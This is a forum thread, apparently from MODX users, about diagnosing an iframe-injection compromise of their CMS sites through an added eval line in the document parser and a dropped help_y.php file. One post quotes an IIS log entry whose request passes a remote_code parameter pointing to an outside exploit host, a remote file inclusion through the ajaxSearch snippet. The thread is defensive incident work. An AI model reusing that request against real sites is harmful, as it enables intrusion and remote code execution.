Can anyone confirm that they saw this iframe hack *without* the use of a script from dynamicdrive? I think I’ve got the URL and parameters that were injected, if anyone wants them.
Matt
As per the security warning in the Security thread, you really need to upgrade to the latest code release.
Ryan Thrash, MODX Co-Founder
FWIW, the JavaScript that this was inserted into (as part of a document.write call) only existed as a chunk, i.e. it was not a file anywhere that was read in from disk.
MattC
The database shows no sign of this code (according to a text search of an SQL dump). The cleaning I did was related to deleting the help_y file and deleting the line added to the document parser code, as opposed to having to mess with any database records. As others noted, it seemed to be there for a bit, then was gone. FWIW, I’ve got a copy of the help_y.php file I found, but I can’t get its data gzuncompressed without an error. If anyone wants a copy of it, PM me with instructions ...
MattC
Rico
Hi,
I’ve had a couple of customers report this on our servers running Windows. From what I can see, in both instances document.parser has the extra eval code; however, what is strange is that the file modified date/time does not seem to have changed: one site has a modified date of 02/01/2008.
It’s running 9.6.3, and another site is running 1.0.2.
I’m going to advise users to upgrade to the latest version, but it would be good to know what the root cause of this exploit is.
Thanks, Aaron
Thanks to the backups we run, I have managed to find when the file was changed.
One customer site had the document.parser file backed up on 17/07/2010 at 01:35am.
So we checked the IIS log files for 16/07/2010 and 17/07/2010 and found this:
2010-07-16 07:10:05 W3SVC1178 VENUS 87.117.200.76 POST /assets/snippets/ajaxSearch/ajax.php - 80 - 212.62.110.20 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ru;+rv:1.8.0.12)+Gecko/20070508+Firefox/1.5.0.12 SN49bf4e0501677=9hmq9t0u4vkpost3vdasthfgt6,+;pird=1;pizd=1;osCcid=1,+;remote_code=http://remotedomainwithexploit.cn/sof/remote_code.txt http://www.domainname.com/assets/snippets/ajaxSearch/ajax.php www.domainname.com 200 0 0 4547 820 1640
It seems ajaxSearch is the way in.
Aaron